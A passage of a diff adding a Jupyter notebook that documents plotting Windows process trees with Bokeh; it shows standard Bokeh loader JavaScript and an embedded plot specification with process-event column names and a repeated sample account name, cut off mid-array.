+    "The module contains functions for building the parent-child relations as well as a number of utility functions for manipulating and extracting the trees. Most of these are described in the later section [Process Tree utility functions](#Process-Tree-utility-functions).\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Plotting a Process Tree"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:29.912000Z",
+     "start_time": "2020-08-25T15:53:29.614996Z"
+    },
+    "persistent_id": "77bbbefd-2888-4127-b95a-18e2f1030039"
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1002\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  const force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  const JS_MIME_TYPE = 'application/javascript';\n  const HTML_MIME_TYPE = 'text/html';\n  const EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  const CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    const script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    const cell = handle.cell;\n\n    const id = cell.output_area._bokeh_element_id;\n    const server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      const cmd_clean = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd_clean, {\n        iopub: {\n          output: function(msg) {\n            const id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      const cmd_destroy = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd_destroy);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    const output_area = handle.output_area;\n    const output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    const toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      const bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      const script_attrs = bk_div.children[0].attributes;\n      for (let i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      const toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      const props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    const events = require('base/js/events');\n    const OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  const NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    const el = document.getElementById(\"1002\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  const js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-mathjax-2.4.2.min.js\"];\n  const css_urls = [];\n  \n\n  const inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (let i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      const cell = $(document.getElementById(\"1002\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"7aecb075-6c8f-47ba-a6b5-63b149b2ff37\" data-root-id=\"1140\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  const docs_json = {\"442811e8-3378-4087-aa0f-563e02fa0971\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1124\"},{\"id\":\"1137\"}]},\"id\":\"1140\",\"type\":\"Column\"},{\"attributes\":{\"axis\":{\"id\":\"1094\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"1097\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1157\",\"type\":\"StringFormatter\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"1171\"},\"group\":null,\"major_label_policy\":{\"id\":\"1172\"},\"ticker\":{\"id\":\"1095\"},\"visible\":false},\"id\":\"1094\",\"type\":\"LinearAxis\"},{\"attributes\":{\"editor\":{\"id\":\"1156\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1155\"},\"title\":\"CommandLine\"},\"id\":\"1133\",\"type\":\"TableColumn\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1069\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1070\"}}},\"id\":\"1074\",\"type\":\"Text\"},{\"attributes\":{\"editor\":{\"id\":\"1158\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1157\"},\"title\":\"ProcessId\"},\"id\":\"1134\",\"type\":\"TableColumn\"},{\"attributes\":{\"children\":[{\"id\":\"1005\"},{\"id\":\"1081\"}]},\"id\":\"1124\",\"type\":\"Row\"},{\"attributes\":{\"editor\":{\"id\":\"1160\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1159\"},\"title\":\"ParentProcessName\"},\"id\":\"1135\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1162\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1161\"},\"title\":\"TargetLogonId\"},\"id\":\"1136\",\"type\":\"TableColumn\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1114\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1116\"},\"nonselection_glyph\":{\"id\":\"1115\"},\"view\":{\"id\":\"1118\"}},\"id\":\"1117\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"columns\":[{\"id\":\"1126\"},{\"id\":\"1128\"},{\"id\":\"1129\"},{\"id\":\"1130\"},{\"id\":\"1131\"},{\"id\":\"1132\"},{\"id\":\"1133\"},{\"id\":\"1134\"},{\"id\":\"1135\"},{\"id\":\"1136\"}],\"height\":150,\"source\":{\"id\":\"1003\"},\"view\":{\"id\":\"1139\"},\"width\":950},\"id\":\"1137\",\"type\":\"DataTable\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1139\",\"type\":\"CDSView\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1072\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1074\"},\"nonselection_glyph\":{\"id\":\"1073\"},\"view\":{\"id\":\"1076\"}},\"id\":\"1075\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"dimension\":\"height\"},\"id\":\"1027\",\"type\":\"WheelPanTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1004\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1112\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1116\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1101\",\"type\":\"SaveTool\"},{\"attributes\":{\"editor\":{\"id\":\"1148\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1147\"},\"title\":\"SubjectUserSid\"},\"id\":\"1129\",\"type\":\"TableColumn\"},{\"attributes\":{\"axis\":{\"id\":\"1020\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":\"navy\",\"group\":null,\"ticker\":null,\"visible\":false},\"id\":\"1023\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1103\",\"type\":\"HelpTool\"},{\"attributes\":{\"range\":{\"id\":\"1010\"},\"value\":0.25},\"id\":\"1062\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1069\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1070\"}}},\"id\":\"1073\",\"type\":\"Text\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1053\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1054\"}}},\"id\":\"1058\",\"type\":\"Text\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1060\",\"type\":\"CDSView\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1125\",\"type\":\"DateFormatter\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1061\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1062\"}}},\"id\":\"1066\",\"type\":\"Text\"},{\"attributes\":{\"coordinates\":null,\"group\":null},\"id\":\"1142\",\"type\":\"Title\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1061\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1062\"}}},\"id\":\"1065\",\"type\":\"Text\"},{\"attributes\":{\"below\":[{\"id\":\"1090\"}],\"center\":[{\"id\":\"1093\"},{\"id\":\"1097\"}],\"height\":700,\"left\":[{\"id\":\"1094\"}],\"renderers\":[{\"id\":\"1117\"}],\"title\":{\"id\":\"1142\"},\"toolbar\":{\"id\":\"1105\"},\"toolbar_location\":null,\"width\":90,\"x_range\":{\"id\":\"1082\"},\"x_scale\":{\"id\":\"1086\"},\"y_range\":{\"id\":\"1084\"},\"y_scale\":{\"id\":\"1088\"}},\"id\":\"1081\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1041\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1098\",\"type\":\"PanTool\"},{\"attributes\":{\"label\":{\"field\":\"SubjectUserName\"},\"renderers\":[{\"id\":\"1040\"}]},\"id\":\"1052\",\"type\":\"LegendItem\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1037\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1039\"},\"nonselection_glyph\":{\"id\":\"1038\"},\"view\":{\"id\":\"1041\"}},\"id\":\"1040\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1144\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1095\",\"type\":\"BasicTicker\"},{\"attributes\":{\"range\":{\"id\":\"1008\"},\"value\":0.1},\"id\":\"1061\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1145\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1004\"}},\"height\":{\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1112\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1114\",\"type\":\"Rect\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1056\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1058\"},\"nonselection_glyph\":{\"id\":\"1057\"},\"view\":{\"id\":\"1060\"}},\"id\":\"1059\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"items\":[{\"id\":\"1052\"}],\"label_text_font_size\":\"7pt\",\"title\":\"SubjectUserName\"},\"id\":\"1051\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"1146\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1146\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1145\"},\"title\":\"SubjectUserName\"},\"id\":\"1128\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1147\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1118\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1148\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1149\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"SaveTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1104\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1004\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1035\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1039\",\"type\":\"Rect\"},{\"attributes\":{\"end\":10,\"start\":1},\"id\":\"1008\",\"type\":\"Range1d\"},{\"attributes\":{\"range\":{\"id\":\"1008\"},\"value\":2.2},\"id\":\"1069\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1014\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1150\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1144\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1125\"},\"title\":\"TimeGenerated\"},\"id\":\"1126\",\"type\":\"TableColumn\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"1003\"},\"glyph\":{\"id\":\"1064\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"1066\"},\"nonselection_glyph\":{\"id\":\"1065\"},\"view\":{\"id\":\"1068\"}},\"id\":\"1067\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"axis\":{\"id\":\"1016\"},\"coordinates\":null,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"group\":null,\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1079\"}},\"id\":\"1019\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1099\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1076\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1151\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1152\",\"type\":\"StringEditor\"},{\"attributes\":{\"callback\":null},\"id\":\"1026\",\"type\":\"TapTool\"},{\"attributes\":{\"overlay\":{\"id\":\"1104\"}},\"id\":\"1100\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"editor\":{\"id\":\"1152\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1151\"},\"title\":\"NewProcessId\"},\"id\":\"1131\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1153\",\"type\":\"StringFormatter\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"1047\"},\"group\":null,\"major_label_policy\":{\"id\":\"1048\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1077\"},\"visible\":false},\"id\":\"1016\",\"type\":\"LinearAxis\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1061\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1062\"}}},\"id\":\"1064\",\"type\":\"Text\"},{\"attributes\":{\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlerts